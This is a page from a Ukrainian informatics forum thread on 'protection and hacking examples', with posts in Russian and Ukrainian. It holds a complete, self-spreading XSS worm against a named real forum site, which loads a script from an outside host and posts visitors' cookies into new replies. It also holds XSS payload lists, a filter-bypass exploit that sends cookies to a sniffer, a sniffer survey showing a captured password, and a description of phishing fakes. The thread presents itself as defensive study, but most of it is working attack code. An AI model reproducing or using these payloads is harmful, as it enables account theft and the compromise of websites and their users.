Сб, 21.10.2017, 09:52
Форум інформатиків України
Головна Реєстрація Вхід
Вітаю Вас, Гість · RSS
Вітання на форумі
Незнайомець
Вітаємо на форумі,
Незнайомцю!

   
зареєструйтесь
Перед реєстрацією обов’язково прочитайте:
Оновлення Учасники Пошук
Особисті повідомлення
Видавництво ’’Аспект’’ Видавництво

Сторінка 2 з 3«123»
Модератор форуму: Bandalak, Ktara, НІКОЛЯ, volevikt 
Форум інформатиків » РОЗДІЛ ІХ: ІНТЕРНЕТ, МЕРЕЖІ, ХОСТІНГ » 9.8 Рубрика системного адміністратора » ЗАХИСТ ТА ПРИКЛАДИ ВЗЛОМУ ВСЬОГО ЧОГО ТІЛЬКИ МОЖЛИВО. (ФОРМАТ ОБГОВОРЕННЯ ВІЛЬНИЙ)
ЗАХИСТ ТА ПРИКЛАДИ ВЗЛОМУ ВСЬОГО ЧОГО ТІЛЬКИ МОЖЛИВО.
НІКОЛЯ Дата: Пт, 10.12.2010, 10:40 | Повідомлення № 1
Знавець вірусів
Повідомлень: 2877
Нагороди: 17
Рейтинг: 201
В даній темі будуть наводитись приклади взлому мил, програмного забезпечення, серваків, та іншого добра. Кому неподобається прохання гуляти мимо!
Матеріал та приклади наведені в темі дадуть можливість вивчити основні методи роботи для захисту власних ресурсів.
Дозволяється викладати приклади як свої власні так і чужі. Авторство необов'язкове, посилання теж.
Andrey123q Дата: Вт, 14.12.2010, 01:17 | Повідомлення № 16
Досвідчений учасник
Повідомлень: 1236
Нагороди: 3
Рейтинг: 84
Как-то пытался тут на форуме информатиков какую-нибудь простенькую XSS найти - не вышло, на укозовских форумах по-ходу дыры более или менее уже прикрыты :)
НІКОЛЯ Дата: Вт, 14.12.2010, 09:13 | Повідомлення № 17
Знавець вірусів
Повідомлень: 2877
Нагороди: 17
Рейтинг: 201
Quote (Andrey123q)
Как-то пытался тут на форуме информатиков какую-нибудь простенькую XSS найти - не вышло, на укозовских форумах по-ходу дыры более или менее уже прикрыты

На нашому ввзагалі а щас щей ліміт на перевищення кількості одночасних потоків я вшарив так що ще одна дірка прикрилась. ;)
НІКОЛЯ Дата: Ср, 15.12.2010, 10:02 | Повідомлення № 18
Знавець вірусів
Повідомлень: 2877
Нагороди: 17
Рейтинг: 201
xss червь на реальном примере

Вступление

В данном посте будет описана история создания само распространяемого кода для web2.0 сайта...

Суть программных червей очень интересна. После единоразового запуска программы, она сама находит способ копироваться и запускаться снова, и снова. Но это не обязательно исполняемый файл, который сканирует сеть на наличие уязвимостей. В эпоху развития Интернета можно использовать WEB-сайты, на которых не достаточно хорошо реализована проверка данных, приходящих от пользователей.

Дальше будет рассмотрен пример для сайта www.bazika.net. Существенно облегчает распространение «вредоносного» кода по сайту тот факт, что на нём используются готовые Javascript библиотеки..

Показанные ниже действия были выполнены в качестве эксперимента, и не имели цель навредить сайту, или его пользователям.

Уязвимость

Для того чтобы программный код начал распространение по сайту нужно найти способ внедрить его в браузер пользователя. На форуме была найдена возможность вставлять Javascript код в сообщение через BB тег IMG. Пример сообщения:

Код:
[іmg]javascript:alert('LOL')[/іmg]

В результате на страничке появится такой HTML код:

Код:
<img src="javascript:alert('LOL')" alt="javascript:alert('LOL')" />

Как видно, здесь вместо адреса картинки вставлен скрипт. В браузере Firefox будет выведен код Javascript вместо картинки, но в таких браузерах как Opera, IE сработает Javascript... Эта идея и будет отправной точкой распространения.

Достаточно будет создать сообщение с «вредоносным» кодом и все пользователи его просматривающие примут участие в распространении «червя» по сайту.

Ниже показан пример начального сообщения, загружающего в браузер скрипт с удалённого адреса:

Код:
[іmg]javascript:var s=document.createElement(String.fromCharCode(115,9 9,114,105,112,116));
s.src='http://h3ck.rv.ua/b/o_O.php';document.body.appendChild(s);
void(0)[/іmg]

Метод распространения.

Скрипт, загруженный с сайта будет создавать от имени пользователя новое сообщение на форуме, которое будет повторно в себя включать «вредоносный» код. Таким образом будет идти размножение «червя» по сайту. Дополнительно выполняется проверка выполнения скрипта, так как может быть создано несколько наших сообщений в одном топике. Выполнение происходит один раз.

Реализация на языке Javascript может быть такой:

Код HTML:
if (!isLoaded) {
// скрываем нашу картинку
for (var i=0; i<document.images.length; i++) {
if (document.images[**i].src.match(/^javascript:/)) {
document.images[**i].style.display = 'none';
}
}
// текст нового сообщения
var xss_body = document.cookie + "\n\n" +
"[img]javascript:var s=document.createElement(String.fromCharCod"+
"e(115,99,114,105,112,116));s.src='"+
"http://h3ck.rv.ua/b/o_O.php"+
"';document.body.appendChild(s);void(0)[/img]";

// id топика выбирается из списка горячих тем
var topics = [];
var regexp=/\/forum\/topic\/(\d+)/;
for (i=1; i<document.links.length; i++) {
if ((result = document.links[**i].href.match(regexp)) && document.links[**i].href.indexOf('#')==-1) {
topics.push(document.links[**i].href.match(regexp)[1]);
}
}
var topic_rand = topics[Math.round(Math.random()*topics.length)];

// создание нового сообщения.
$.post('/forum/do/',{action:"add_reply", text:xss_body, topic:topic_rand},
function(data){alert(data);},"json");
}
var isLoaded = 1;

звёздочки вставлены потому что парсер форума думает что это тег [*i]

Результат:

По идеи здесь должен быть рисунок, но ссылка на него в статье не активна, так что без него=( (прим. от меня)

Заключение.

После создания нескольких начальных сообщений на форуме, можно было увидеть как один за другим появляются сообщения от пользователей. Этот процесс мог бы продолжатся если бы через несколько часов не закрыли сайт на доработку.
В принципе, в подключаемом файле мог быть намного более злой код, который бы выполнялся при каждом просмотре сообщения.

Данный пост был написан для того чтобы показать насколько важно заботится о клиентской части безопасности сайта, особенно при использовании таких технологий как AJAX.

P.S. Как видите для того чтобы удачно эксплуатировать xss уязвимости не обязятельно использовать обычный подход с редиректом юзера на php сниффер. Для этого вполне можно использовать уязвимый сайт.

НІКОЛЯ Дата: Ср, 15.12.2010, 10:08 | Повідомлення № 19
Знавець вірусів
Повідомлень: 2877
Нагороди: 17
Рейтинг: 201
Xss — атаки

Сейчас по всему интернету можно встретить большое количество разнообразных форумов, гостевых книг, чатов, сайтов и других средств, созданных для нашего с вами общения. На всех этих сайтах можно выделить одну особенность — вы можете изменять их содержание и эти изменения, понятное дело, контролируются админами этих сайтов: фильтруются неугодные символы и все такое. Но иногда возникает момент, когда эти изменения выходят из под контроля. Тогда можно провести все, что угодно: php-инклудинг, SQL-инъекция и, тема этого поста — XSS атаки.

XSS расшифровывается ка Crossing Site Scripting. Он же межсайтовый скриптинг. Абривиатура могла бы быть CSS, но это уже забито Caskading Style Sheets — стилем. О нем позже

Вся суть этой атаки заключается в том, что вы внедряете свой скрипт в чужую страницу, а этот скрипт уже работает на вас: крадет чужие куки, заставляет окно закрываться, в скрипт вмонтируется какой-нибудь сплоит и т. д.

Теперь вся проблема заключается в том, КАК вставить свой скрипт в чужую страницу. Я опишу все известные мне методы, подразделив их на группы.

BB-XSS.
Вы наверное часто замечаете, что форумы, чаты и etc почти всегда дают своим пользователям возможность использовать различные виды начертаний, шрифта, цвета применительно к тексту, вставка картинок, смайликов и т.д. В реализации этого не последнюю роль играет использование кодов BB: выражений в квадратных скобках, которые при парсинге станун тегами. Например,

перейдет в <b>
[i] в <i>

и т.д.
Не разрешать же юзерам внедрять в страницу какой не попадя код? Пусть обходяться BB кодами...

Итак, нам надо вставить скрипт.
Первое, что вообще надо учитывать, это какие символы и в каком месте фильтруются. Нам может понадобиться один или несколько следующих символов:' ' < > ( ) " ; - ! + = & { }`
Поэтому просто вставляем это в тело страницы и смотрим, что фильтруется, а что нет. Учитываем небольшую особенность, что в BB тегах оно может фильтроваться, а вне нет. Но это можно обойти. Если чего-то не достает и упорно фильтруется, то это остается одно — закодировать.
Пара слов о кодировке.
Особенность парсинга текста в браузерах заключается в том, что расшифровка символов происходит до выполнения скрипта. Это значит например, что<IMG SRC=javascript:alert("XSS">
перейдет в <IMG SRC=javascript:alert("XSS")>, а затем выполнится.
Закодировть эти символы с текстовыми метками можно:

" " двойная кавычка
& & амперсанд
< < знак 'меньше'
> > знак 'больше'

Давайте с вами разберемся, какими способами мы вообще можем вставлять скрипты в тело страницы.

[B]Непосредственно
<script>alert('lol');</script>
Эта возможность выпадает редко и в основном в какой-нибудь личной информации пользователя, полях, который не редактируются с тектовых полей, но значения которых можно изменить в post или get запросе: например принудительно перехватить и послать на сервер подделанный пакет:
допустим передается в пакете имя скажем цвета (red) мы можем переделать его в
red'" >, тестируя таким образом на символы. Если что-то сработает и не отфильтруется, xss обеспечена.
это может принять форму
<tgname ***'red'"><script>...
в тег тоже можно так залезть, выходя из кавычек.
О подделке пакетов смотрите другие разделы.
Чтобы избежать фильтрации, можно изменить регистр
<sCript>
Через ссылку на скрипт посредством javascript: или vbscript:
<*** src(href,url)="javascript:alert('lol')">
<META HTTP-EQUIV="Refresh" CONTENT=3; URL=javascript:alert('lol')">
здесь, если название тега будет img/image, iframe, то скрипт выполниться сразу, поскольку браузер попытается подгрузить ее содержимое и наткнется на наш скрипт. Если это будет ссылка, то браузер будет ждать, пока пользователь нажмет ее.
То же со стилем:
<*** style=backround:url("javascript:alert('lol'")>;
это метод плох тем, что javascript: фильтруется и сложно найти лазейку в скрипте фильтрации, которая оставит javascrip:
Через события.
В DHTML существует события, которые запускают скрипты.
например событие onload применяется при загрузке картинок, фреймов, окон.
<img src=images/smile.gif onload=alert('lol')>
Не оставлю незамеченными такие события как
onerror="при возникновении ошибки";
onmouseover="при наведении курсора мышки";
onmouseout="при убратии курсора с объекта";

Остановлю ваше внимание на событии onerror
удобно дать какой-нибудь картинке одрес, который никуда не ведет, что повлечет ошибку и выполнение скрипта
<img/image src="images/smile.gifadalshexss"onerror=alert('lol')>
через url браузера. Иногда случается, что код, который отображается в URL, становиться частью страницы. Тогда мы пишем этот код в урл, предварительно замаскировав его. Понятно, что это нада искать.
Somesite.dn/forum/?somevar=<script>alert('lol')</script>
Somesite.dn/forum/?somevar=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%2 8%27%6C%6F%6C%27%29%3C%2F%73%63%72%69%70%74%3E

Похоже это все, а теперь перейдем к частностям.
В частности наличие xss-уязвимости позволяет тащить куки с сайта, а затем вставлять себе и становиться теми, у кого эти куки были взяты.
Если уязвимость межскриптовая, то должны быть наш скрипт на сайте и еще прога, которая ловит то, что мы взяли. Например посредством GET-запроса.
С чужого сайта приходит запрос типа netch.ru/**/pass=123&login=chel
у нас находится скрипт, который ловит этот запрос и записывает в лог.

А теперь небольшой пример с icon board.
Взлом этот начался с заказа, поэтому подробности не раскрываются.

Сначала я попробовал javascript:, но скрипт предупредил меня о серьезных намерениях рассказать все админу.
Тогда я начал химичить с подстановкой одного тега в другой и понял, что
внутри тега тег [color] не фильтруется. Отлично. Идем дальше. Пробуем вставить событие. После названия цвета. Но гадина не восприимала пробелы и выводила все, как обычный текст. Можно было поставить /, но я решил попробовать напрямую. И не пожалел. [COLOR=onerror='alert(1)']y' работает. Все. Остается тока добавить снифер и собрать сплоит. Но почему адреса с точками упорно не принимались. Тогда я просто воспользовался тулзой по перекодеровке и все заработало [COLOR=onerror='a=String.fromCharCode(108,111,108); alert(a)']y' Теперь все готово и мы собираем сполит
[COLOR=onerror='img=new/**/Image();a=String.fromCharCode(а,д,р,е,с,,с,н,и,ф,е ,р,а,_,с,o,d,e,d);img.src=a+document.cookie']y'
И ждем теперь куков. ;)

НІКОЛЯ Дата: Ср, 15.12.2010, 10:13 | Повідомлення № 20
Знавець вірусів
Повідомлень: 2877
Нагороди: 17
Рейтинг: 201
Теория XSS

Вначале дадим некоторые определения, которые на мой взгляд наиболее кратко и понятно описывают XSS.

Аутентификационные данные - в контексте данной статьи представляют из себя логин и пароль пользователя веб-системы.

Межсайтовый скриптинг (Cross Site Scripting, XSS) – уязвимость, возникающая вследствие недостаточной фильтрации данных, переданных одним пользователем с последующим их выводом другим пользователям системы.

XSS-атака – это реализация угрозы безопасности Веб-систем на основе уязвимости типа межсайтового скриптинга.

Активная XSS (сохраненная) – уязвимость, возникающая вследствие недостаточной фильтрации данных, переданных одним пользователем, сохраненных в системе и доступных для вывода другим пользователям системы.

Пассивная XSS (переданная) – уязвимость, возникающая вследствие недостаточной фильтрации данных, переданных системе в параметрах HTTP-запроса с последующим их выводом в HTML-страницу.

В настоящее время существует огромное количество разновидностей атак основанных на уязвимостях типа XSS. В настоящий момент из этого множества можно выделить следующие шесть видов угроз:
1. угроза похищения идентификационной сессии, идентификационного ключа, параметров хранящихся в cookie;
2. угроза отслеживания действий пользователя и сбора статистической информации;
3. угроза скрытого влияния на действия привилегированного пользователя системы;
4. угроза эксплуатации уязвимости программного обеспечения пользователя(эксплойты);
5. угроза подмены пользовательской информации, изменения структуры и функциональности системы(фейк);
6. угроза скрытого перенаправления информационных потоков в сети(dos, ddos);

[Анализ]
Существующие методы реализации угроз похищения идентификационной сессии, идентификационного ключа и параметров, хранящихся в cookie, имеют следующие недостатки при использовани:

• отсутствие аутентификационных данных в полном объеме. Обычно в куки хранится признак аутентификации (например некий ключ, идентификатор), а не сами данные (логин и пароль);

• временные ограничения. Похищение идентификатора сессии позволяет получить права пользователя только на время продолжительности сеанса, установленного в системе, после чего идентификатор меняется и необходимо вновь его получать;

• вероятное раскрытие атаки. Получив частичные аутентификационные данные, например идентификатор сессии, и соответственно, временно, права пользователя системы, атакующий имеет возможность сменить аутентификационные данные пользователя, что может повлечь за собой, раскрытие его присутствия в системе в момент, когда пользователь попытается войти в систему, используя свои данные;

• отсутствие куки. Даже если уязвимость присутствует в системе, то по различным причинам (политика безопасности) поддержка куки может быть запрещена в самой системе или отключена их поддержка в настройках браузера пользователя.

Известные методы реализации угроз подмены информации, изменения структуры и функциональности системы имеют следующие недостатки при получении аутентификационных данных:

• изменение интерфейса системы. Изменение структуры или функциональности может повлечь нарушение нормальной работы системы, что в свою очередь может привести к визуальным изменениям интерфейса и вызвать подозрения пользователей;

• изменение адреса. При переводе пользователя на подставную систему, имеющую точную копию как по дизайну, так и функциональности, в адресной строке браузера изменится адрес реальной системы, что также вызовет подозрения пользователей;

• трудоемкость реализации. При перенаправлении пользователя на подставную систему, при подмене реальной формы авторизации на собственную форму или внедрении элемента, копирующего дизайн оригинальной страницы системы, возникает трудоемкая работа по созданию точной копии дизайна и идентичной функциональности системы;

• ограничение уязвимых параметров. При подмене реальной формы авторизации на собственную форму или внедрении элемента, копирующего дизайн оригинальной страницы системы, необходимо внедрить через уязвимый параметр достаточно большой по размеру скриптовый сценарий, что не всегда допустимо в системе (например если уязвимый параметр “имя пользователя” ограничен 20 символами).

[Метод]
Разработанный метод похищения аутентификационных данных основан на особенностях механизма обработки объектной модели документа (Document Object Model, DOM) в формате HTML, используемого браузерами и другими приложениями в соответствии со спецификацией языка гипертекстовой разметки HTML. При разборе структуры и построении объектного дерева документа, для дальнейшей интерпретации, браузер осуществляет анализ данных в документе, проходя от начала до конца один раз. Как и во многих языках программирования синтаксис языка HTML позволяет переопределять значения объектов на протяжении всего документа. Окончательным значением каждого элемента объектного дерева, построенного браузером при анализе документа, является значение присвоенное элементу последним в коде страницы. Основная идея предложенного метода заключается в переопределении реального функционала подсистемы аутентификации, определенного разработчиками в Веб-интерфейсе системы, на собственный функционал. Следовательно необходимым условием для реализации предложенного метода является расположение уязвимого параметра после определения функционала подсистемы аутентификации в документе.

НІКОЛЯ Дата: Пн, 10.01.2011, 10:08 | Повідомлення № 21
Знавець вірусів
Повідомлень: 2877
Нагороди: 17
Рейтинг: 201
Що так е СНІФФЕР ;)
Сніффери - це проги, які перехоплюють весь мережевий трафік. Сніффери корисні для діагностики мережі (для адмінів) і для перехоплення паролів (зрозуміло для кого:)). Наприклад, якщо ти отримав доступ до однієї мережевої машині і встановив там сніффер, то незабаром всі паролі від їх підмережі будуть твої. Сніффери ставлять мережеву карту в прослуховує режим (PROMISC). Тобто вони отримують всі пакети. У локалці можна перехоплювати всі надіслані пакунки з усіх машин (якщо ви не розділені всякими хабами), так як там практикується широкомовлення. Сніффери можуть перехоплювати всі пакети (що дуже незручно, дуже поспішав переповнюється лог файл, зате для більш детального аналізу мережі саме воно) або тільки перші байти від всяких ftp, telnet, pop3 і т.д. (Це саме веселе, зазвичай приблизно у перших 100 байтах міститься ім'я та пароль:)). Сніфферів зараз розвелося ... Безліч сніфферів є як під Unix, так і під Windows (навіть під DOS є:)). Сніффери можуть підтримувати лише певну вісь (наприклад linux_sniffer.c, який підтримує Linux:)), або кілька (наприклад Sniffit, працює з BSD, Linux, Solaris). Сніффери так розмножилися через те, що паролі передаються по мережі відкритим текстом. Таких служб сила-силенна. Це telnet, ftp, pop3, www і т.д. Цими службами користується сила-силенна народу:). Після буму сніфферов почали з'являтися різні алгоритми шифрування цих протоколів. З'явився SSH (альтернатива telnet, що підтримує шифрування), SSL (Secure Socket Layer - розробка Netscape, здатна зашифрувати www сеанс). З'явилися всякі Kerberous, VPN (Virtual Private Network). Заюзать якісь AntiSniff'и, ifstatus'и і т.д. Але це в корені не змінило положення. Служби, які використовують передачу пароля plain text'ом юзаются у всю:). Тому сніффать ще довго будуть:).

Windows реалізації сніфферів

Досить просунутий сніффер виробництва TamoSoft. Можна встановити свої правила на сніффінг (наприклад ігнорувати ICMP, а TCP сніффать, також крім Internet протоколів є підтримка Ethernet протоколів, таких як ARP, SNMP, NOVELL тощо). Можна наприклад сніффать тільки вхідні пакети, а решта ігнор. Можна вказати лог-файл для всіх пакетів з лімітів розміру в мегахит. Має дві tools'и - Packet Generator і NIC Vendor Indentifier. Можна подивитися всі подробиці посланих / отриманих пакетів (наприклад в TCP пакеті можна переглянути Source Port, Destination Port, Data length, Checksum, Sequence, Window, Ack, Flags, Urgent). Радує ще те, що вона автоматично встановлює CAPTURE драйвер. Загалом тулза дуже корисна для сніфа, рекомендую всім.

SpyNet - packetstorm.securify.com
Досить відомий сніффер виробництва Laurentiu Nicula 2000:). Звичайні функції - перехоплення / декодінг пакетів. Хоча декодінг розвинений прикольно (можна наприклад по пакетах відтворювати сторінки, на яких побував юзер!). Загалом на любителя:).

Analyzer - neworder.box.sk
Analyzer вимагає установку спеціального драйвера, вкладеного в пакет (packet.inf, packet.sys). Можна подивитися всю інфу про вашу мережевої карти. Також Analyzer підтримує роботу з командним рядком. Він чудово працює з локальною мережею. Має кілька утиліт: ConvDump, GnuPlot, FlowsDet, Analisys Engine. Нічого видатного.

IRIS - www.eeye.com
IRIS продукт відомої фірми eEye. Представляє великі можливості по фільтрації. Мене в ньому сильно порадувало три фішки:
1.Protocol Distribution
2.Top hosts
3.Size Distribution
Також є Packet Decoder. Він підтримує розвинену систему логів. А доступні можливості фільтрації перевершують всі сніффери огляду. Це Hardware Filter, який може ловити або всі пакети (Promiscious), або з різними обмеженнями (наприклад захоплювати тільки multicast пакети або broadcast пакети, або тільки Mac фрейми). Можна фільтрувати по певним MAC / IP адресами, по портах, по пакетах, що містить певні символи. Загалом непоганий сніффак. Вимагає 50comupd.dll.

WinDUMP
Аналог TCPdump for Unix. Цей сніффак діє через командний рядок і представляє мінімальні можливості по конфігурації і ще вимагає бібліотеку WinPcap. Мені не дуже ...

SniffitNT
Теж вимагає WinPcap. Робота тільки як командним рядком, так і в інтерактивному режимі. Зі складними опціями. Мені не дуже.

ButtSniff
Звичайний пакетний сніффер створений відомою групою CDC (Cult of the Dead Cow). Фішка його в тому, що його можна використовувати, як плагін до BO:) (Дуже корисно:)). Робота з командного рядка.

Існують ще безліч сніффер, таких як NatasX, NetXRay, CooperSniffer, LanExplorer, Net Analyzer і т.д. Підемо дальне ...

Unix'ов сніффери

Всі сніффери даного огляду можна знайти на packetstorm.securify.com.

linsniffer
Це простий сніффер для перехоплення логінів / паролів. Стандартна компіляція (gcc-o linsniffer linsniffer.c).
Логи пише в tcp.log.

linux_sniffer
Linux_sniffer потрібно тоді, коли ви хочете детально вивчити мережу. Стандартна компіляція. Видає всяку шняга додатково, типу isn, ack, syn, echo_request (ping) і т.д.

Sniffit
Sniffit - просунута модель сніффер написана Brecht Claerhout. Install (потрібна libcap):
#. / Configure
# Make
Тепер запускаємо сніффер:
#. / Sniffit
usage:. / sniffit [-xdabvnN] [-P proto] [-A char] [-p port] [(-r |-R) recordfile]
[-L sniflen] [-L logparam] [-F snifdevice] [-M plugin]
[-D tty] (-t <Target IP> |-s <Source IP>) | (-i |-I) |-c <config file>]
Plugins Available:
0 - Dummy Plugin
1 - DNS Plugin

Як бачите, сніфф підтримує безліч опцій. Можна використовувати сніффак в інтерактивному режимі. Сніфф хоч і досить корисна прога, але я їй не користуюся. Чому? Тому що у Sniffit великі проблеми із захистом. Для Sniffit'a вже вийшли ремоутний Рут і дос для Лінукса і дебіана! Не кожен сніффер собі таке дозволяє:).

HUNT
Це мій улюблений сніффак. Він дуже простий у використанні, підтримує багато прикольних фішок і на даний момент не має проблем з безпекою. Плюс не особливо вимогливий до бібліотек (як наприклад linsniffer і Linux_sniffer). Він може в реальному часі перехоплювати поточні з'єднання і під чисту дамп з віддаленого терміналу. Загалом, Hijack rulezzz:). Рекомендую всім для посиленого юзанья:).
Install:
# Make
Run:
# Hunt-i [interface]

READSMB
Сніффер READSMB вирізаний з LophtCrack і портовано під Unix (як не дивно:)). Readsmb перехоплює SMB пакети.

TCPDUMP
tcpdump - досить відомий аналізатор пакетів. Написаний ще більш відомим чолом - Вен Якобсоном, який придумав VJ-стиск для PPP і написав прогу traceroute (і хто знає що ще?). Вимагає бібліотеку Libpcap.
Install:
#. / Configure
# Make
Тепер запускаємо її:
# Tcpdump
tcpdump: listening on ppp0
Всі твої коннект виводить на термінал. Ось приклад виведення на пінг
ftp.technotronic.com:
02:03:08.918959 195.170.212.151.1039> 195.170.212.77.domain: 60946 + A?
ftp.technotronic.com. (38)
02:03:09.456780 195.170.212.77.domain> 195.170.212.151.1039: 60946 * 1/3/3 (165)
02:03:09.459421 195.170.212.151> 209.100.46.7: icmp: echo request
02:03:09.996780 209.100.46.7> 195.170.212.151: icmp: echo reply
02:03:10.456864 195.170.212.151> 209.100.46.7: icmp: echo request
02:03:10.906779 209.100.46.7> 195.170.212.151: icmp: echo reply
02:03:11.456846 195.170.212.151> 209.100.46.7: icmp: echo request
02:03:11.966786 209.100.46.7> 195.170.212.151: icmp: echo reply
Загалом, сніфф корисний для налагодження мереж, знаходження несправностей і т.д.

Dsniff
Dsniff вимагає libpcap, ibnet, libnids і OpenSSH. Записує тільки введені команди, що дуже зручно. Ось приклад логу конекту на unix-shells.com:

02/18/01 3:58:04 tcp my.ip.1501 -> handi4-145-253-158-170.arcor-ip.net.23
(Telnet)
stalsen
asdqwe123
ls
pwd
who
last
exit

Ось dsniff перехопив логін з паролем (stalsen/asdqwe123).
Install:
#. / Configure
# Make
# Make install

Захист від сніфферов

Самий вірний спосіб захисту від сніфферов - використовувати шифрування (SSH, Kerberous, VPN, S / Key, S / MIME, SHTTP, SSL і т.д.). Ну а якщо не полювання відмовлятися від plain text служб та встановлення додаткових пакетів:)? Тоді пора юзати антісніфферскіе пекети ...

AntiSniff for Windows
Цей продукт випустила відома група Lopht. Це був перший продукт у своєму роді. AntiSniff, як сказано в описі:
"AntiSniff is a Graphical User Interface (GUI) driven tool for detecting promiscuous Network Interface Cards (NICs) on your local network segment". Загалом, ловить карти в promisc режимі. Підтримує величезну кількість тестів (DNS test, ARP test, Ping Test, ICMP Time Delta Test, Echo Test, PingDrop test). Можна скані як одну машину, так і сітку. Тут є підтримка логів. AntiSniff працює на win95/98/NT/2000, хоча рекомендована платформа NT. Але його царювання було недовгим і вже незабаром з'явився сніффер під назвою AntiAntiSniffer:), написаний Майком Перрі (Mike Perry) (знайти його можна за адресою www.void.ru/news/9908/snoof.txt). Він заснований на LinSniffer (розглянутий далі).

Unix sniffer detect:
Сніффер можна виявити командою:
# Ifconfig-a
lo Link encap: Local Loopback
inet addr: 127.0.0.1 Mask: 255.0.0.0
UP LOOPBACK RUNNING MTU: 3924 Metric: 1
RX packets: 2373 errors: 0 dropped: 0 overruns: 0 frame: 0
TX packets: 2373 errors: 0 dropped: 0 overruns: 0 carrier: 0
collisions: 0 txqueuelen: 0

ppp0 Link encap: Point-to-Point Protocol
inet addr: 195.170.yx PtP: 195.170.yx Mask: 255.255.255.255
UP POINTOPOINT PROMISC RUNNING NOARP MULTICAST MTU: 1500 Metric: 1
RX packets: 3281 errors: 74 dropped: 0 overruns: 0 frame: 74
TX packets: 3398 errors: 0 dropped: 0 overruns: 0 carrier: 0
collisions: 0 txqueuelen: 10

Як бачите інтерфейс ppp0 стоїть у PROMISC mode. Або оператор завантажив сніфф для перевірки мережі, або вас вже мають ... Але пам'ятайте, що ifconfig можна спокійно підмінити, тому юзайте tripwire для виявлення змін і всілякі проги для перевірки на сніфф.

AntiSniff for Unix.
Працює на BSD, Solaris і Linux. Підтримує ping / icmp time test, arp test, echo test, dns test, etherping test, загалом аналог AntiSniff'а для Win, тільки для Unix:).
Install:
# Make linux-all

Sentinel
Теж корисна прога для вилову сніфферів. Підтримує безліч тестів. Проста у використанні.
Install: # make
#. / Sentinel
. / Sentinel [method] [-t <target ip>] [options]
Methods:
[-A ARP test]
[-D DNS test]
[-I ICMP Ping Latency test]
[-E ICMP Etherping test]
Options:
[-F <non-existant host>]
[-V Show version and exit]
[-N <number of packets/seconds>]
[-I <device>]

Опції настільки прості, що no comments.

Ось ще кілька утиліт для перевірки вашої мережі (for Unix):
packetstorm.securify.com / UNIX / IDS / scanpromisc.c-ремоутний детектор PROMISC mode для ethernet карт (for red hat 5.x).
http://packetstorm.securify.com/UNIX/IDS/neped.c - Network Promiscuous Ethernet Detector (потрібно libcap & Glibc).
http://packetstorm.securify.com/Exploit_Code_Archive/promisc.c-сканує девайси системи на детектив сніффери.
http://packetstorm.securify.com/UNIX/IDS/ifstatus2.2.tar.gz - ifstatus тестувати мережні інтерфейси в PROMISC mode. ;)

НІКОЛЯ Дата: Пн, 10.01.2011, 10:48 | Повідомлення № 22
Знавець вірусів
Повідомлень: 2877
Нагороди: 17
Рейтинг: 201
Множественные уязвимости в Gimp

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю выполнить произвольный код на целевой системе.

1. Уязвимость существует из-за ошибки проверки границ данных в функции loadit() в файле plug-ins/common/sphere-designer.c плагина Sphere Designer. Злоумышленник может обманом заставить пользователя открыть с помощью уязвимого плагина специально сформированный файл, вызвать переполнение стека и выполнить произвольный код на целевой системе.

2. Уязвимость существует из-за ошибки проверки границ данных в функции load_preset_response() в файле plug-ins/lighting/lighting-ui.c плагина Lighting Effects. Злоумышленник может обманом заставить пользователя открыть с помощью уязвимого плагина специально сформированный Lighting preset файл, вызвать переполнение стека и выполнить произвольный код на целевой системе.

3. Уязвимость существует из-за ошибки проверки границ данных в функции gfig_read_parameter_gimp_rgb() в файле plug-ins/gfig/gfig-style.c. Злоумышленник может обманом заставить пользователя открыть с помощью GFIG плагина специально сформированный XCF файл, вызвать переполнение стека и выполнить произвольный код на целевой системе.

4. Уязвимость существует из-за ошибки проверки границ данных в функции read_channel_data() в файле plug-ins/common/file-psp.c. Удаленный пользователь может с помощью специально сформированного PSP файла вызвать переполнение динамической памяти и выполнить произвольный код на целевой системе.

Решение: Способов устранения уязвимости не существует в настоящее время. ;)

НІКОЛЯ Дата: Пн, 10.01.2011, 11:13 | Повідомлення № 23
Знавець вірусів
Повідомлень: 2877
Нагороди: 17
Рейтинг: 201
В этой статє речь пойдет о буткитах — вредоносных программах, получающих управление до начала загрузки операционной системы посредством инфицирования главной загрузочной записи жесткого диска (MBR).
Первый вредоносный буткит, известный под именами Sinowal и Mebroot, появился в 2007 году, и представлял собой на тот момент заметную инновацию. Затем последовало затишье: в течение трех лет технология заражения MBR практически не использовалась разработчиками вредоносного кода, несмотря на её привлекательность: антивирусы всегда плохо справлялись даже с хорошо изученным буткитом Sinowal, не говоря уже о технологии заражения MBR в целом.
И вот, относительно недавно свет увидели несколько новых вредоносных программ класса «буткит». Это знаковое событие, указывающее на то, что практика применения буткит-техник во вредоносных программах не закончится одиночными образцами, а, возможно, приобретёт более массовый характер.
Докладна і повна версія статті можна скачать та переглянуть тут http://depositfiles.com/files/ciuwry0yz
Думаю багато кому буде цікаво типаче це вже обговорювалось на сторінках форуму але деякі доказували що це з області фантастики B)
volevikt Дата: Пн, 10.01.2011, 13:52 | Повідомлення № 24
Перспективна вчителька
Повідомлень: 1800
Нагороди: 24
Рейтинг: 199
Quote (НІКОЛЯ)
Злоумышленник может обманом заставить пользователя открыть с помощью уязвимого плагина специально сформированный файл

Якщо можна, детальніше. Яким чином заставити?


Відредаговано: volevikt - Пн, 10.01.2011, 13:53
Jokerz Дата: Пн, 10.01.2011, 17:26 | Повідомлення № 25
Хостер
Повідомлень: 1193
Нагороди: 4
Рейтинг: 97
ну попросить:) допустим: привет, хочешь глянуть на мои эротические фотки? ну и дать фотки. атам не фотки а вирусняга
НІКОЛЯ Дата: Пн, 10.01.2011, 17:40 | Повідомлення № 26
Знавець вірусів
Повідомлень: 2877
Нагороди: 17
Рейтинг: 201
Краще вже номер з фейком прочудить ;) Практичніше
НІКОЛЯ Дата: Пн, 10.01.2011, 17:58 | Повідомлення № 27
Знавець вірусів
Повідомлень: 2877
Нагороди: 17
Рейтинг: 201
Як створити фейк описувать небуду шкода часу, це без мене зробили вже багато разів наприклад тут ЯК ЦЕ СКЛЕПАТЬ - ФЕЙК НА ШВИДКУ РУКУ
Визначення фейку є багато в нашому випадку це - Фейк (веб-страницы)
Фейком называется страница или сайт, где находится точная копия какого-либо веб-сайта, для просмотра которого нужна обязательная авторизация. Используется для кражи логинов и паролей у нубов. Принцип действия: жертва получает ссылку на сайт, авторизуется с настоящим логином, данные отправляются в файл на сайте, злоумышленник получает логин и пароль жертвы и входит на сайт.

